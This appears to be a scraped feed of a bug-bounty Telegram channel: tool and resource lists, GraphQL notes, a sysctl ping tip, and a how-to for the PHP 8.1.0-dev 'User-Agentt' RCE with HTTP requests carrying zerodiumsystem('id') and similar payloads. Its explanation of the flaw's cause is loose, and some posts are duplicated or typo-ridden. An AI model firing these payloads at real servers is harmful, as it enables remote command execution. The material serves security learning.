SQLi Time-Based Blind Finding Methods: https://medium.com/@erkankavas/sqli-time-based-blind-finding-methods-cdef02de2d0e?source=rss------bug_bounty-5
Medium
SQLi Time-Based Blind Finding Methods
Although I am not currently living in my home country, I decided to write this blog post about a SQL injection vulnerability I discovered…
PHP 8.1.0-dev RCE via User-Agentt Exploit
Introduction
In some versions of PHP 8.1.0-dev, a Remote Code Execution (RCE) vulnerability was discovered through an uncommon HTTP header called User-Agentt. This vulnerability can be exploited if the application processes incoming headers without proper sanitization, allowing arbitrary system commands to be executed on the server.
How Does the Vulnerability Work?
The vulnerability occurs when the application uses
$_SERVER['HTTP_USER_AGENTT']
unsafely, especially if the value is passed to functions like eval() or system().
If input validation is not implemented, attackers can execute unauthorized commands directly on the server.
Example of Vulnerable PHP Code
<?php
$user_agent = $_SERVER['HTTP_USER_AGENTT'];
eval($user_agent);
?>
Why is this dangerous?
Because an attacker can send an HTTP request with a User-Agentt header containing malicious PHP code, which will be executed directly on the server.
How to Exploit the Vulnerability
1. Testing Delay with sleep()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);
•If the response is delayed by 5 seconds, it confirms that the code is being executed successfully.
2. Executing a System Command
with system()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');
•If the server responds with user information such as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
•this means RCE exploitation is successful.
3. Executing PHP via phpinfo()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();
•This might display the current PHP configuration, which helps in understanding the target environment.
Conclusion
This vulnerability is extremely dangerous because it allows direct command execution on the server, potentially leading to a full compromise. Developers must be cautious about handling external inputs and always keep their PHP versions up to date.
📖 Windows Server 2025 Administration Fundamentals: A beginner's guide to managing and administering Windows Server environments , Fourth Edition
💠 Info : https://www.packtpub.com/en-us/product/windows-server-2025-administration-fundamentals-9781836205005
💠 Info : https://www.packtpub.com/en-us/product/windows-server-2025-administration-fundamentals-9781836205005
Please open Telegram to view this post
VIEW IN TELEGRAM
🔍 Link Gopher🔍 Adblock Plus🔍 FoxyProxy Standard🔍 Video Speed Controller🔍 Check XSS🔍 HackTools🔍 Bulk URL Opener🔍 Temp Mail🔍 JS Beautify CSS HTML🔍 Multi-Account Containers
🌐
TruffleHog
🌐
Code Formatter
🌐
Freedium Extension
🌐
BuiltWith
🌐
Wappalyzer
🌐
WhatRuns
🌐
Retire.js
🌐
Cookie Extractor
🌐
Wayback Machine
🌐
EXIF Data Viwer
🌐
Shodan
🌐
S3 Bucket List
🌐
Ublock Origin
🌐
Resources Saver
🌐
Dot Git
🌐
EndPointer
Please open Telegram to view this post
VIEW IN TELEGRAM
addons.mozilla.org
Link Gopher – Get this Extension for 🦊 Firefox (en-US)
Download Link Gopher for Firefox. Extracts all links from web page, sorts them, removes duplicates, and displays them in a new tab for inspection or copy and paste into other systems.
👍1🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
GraphQL pentesting focuses on identifying security vulnerabilities in applications that use GraphQL for data querying. Unlike REST APIs, GraphQL allows clients to request specific data, which can expose underlying issues if not properly secured. Key areas of concern include improper authorization checks, excessive data exposure, and insufficient input validation. Pentesters should look for flaws such as introspection queries revealing sensitive schema details, or complex queries leading to denial of service. Ensuring robust input validation, implementing strict authorization checks, and limiting query complexity are essential practices to secure GraphQL endpoints.
🔗 Hacktricks - GraphQL and Security🔗 Five easy ways to hack GraphQL targets🔗 Portswigger - Graphql🔗 ApiSecurity
📱 PayloadsAllTheThings📱 hacking graphql📱 Awesome Graphql Security📱 Hack-graphql
🖤 NahamCon2024: GraphQL is the New PHP🖤 Finding Your Next Bug: GraphQL🖤 GraphQL API Pentesting
📕 Black Hat GraphQL
📕 Hacking APIs - Breaking Web Application ...
📕 API Security in Action
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
All these GitHub Repositories contains 1000+ Hackerone reports to read from which you can learn how bug bounty hunters did recon to find IDOR Vulnerability, I suggest read atleast 300 reports to get your own unique perspective on IDOR Vulnerability.
📕 Bug Bounty Bootcamp - By Vickie Li
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Closing the server ping in the operating system layer (to increase security)
echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf
Sysctl -p
To open the ping, just enter the value of 0 instead of 1.
Closing the server ping in the operating system layer (to increase security)
echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf
Sysctl -p
To open the ping, just enter the value of 0 instead of 1.
❤4
https://www.computerhope.com/
Interesting site, a lot of information about network, security, technology and ...
Of all years
From the past to now
Interesting site, a lot of information about network, security, technology and ...
Of all years
From the past to now
Computer Hope
Computer Hope's free computer help
Free computer help and support. Answering all your computer related questions with complete information on all hardware and software.
Someone wrote a script that can be met with a server's security, it doesn't work out more about the pain of the newcomers not to have these common problems in configuring the server:
https://github.com/vernu/vps-audit
https://github.com/vernu/vps-audit
GitHub
GitHub - vernu/vps-audit: lightweight, dependency-free bash script for security, performance auditing and infrastructure monitoring…
lightweight, dependency-free bash script for security, performance auditing and infrastructure monitoring of Linux servers. - vernu/vps-audit
🔥Always remember to test the API for existence of addition headers.
X-Originaal-URL: /v1/api/endpoint_here
BOOM => Entire API routes disclosure.
Credit: @driccosec
X-Originaal-URL: /v1/api/endpoint_here
BOOM => Entire API routes disclosure.
Credit: @driccosec
👍5
Oreilly | Mastering Cybersecurity with Python From Basics to Advanced 2025
Info : https://www.oreilly.com/library/view/mastering-cybersecurity-with/9781837029273/
Info : https://www.oreilly.com/library/view/mastering-cybersecurity-with/9781837029273/
❤1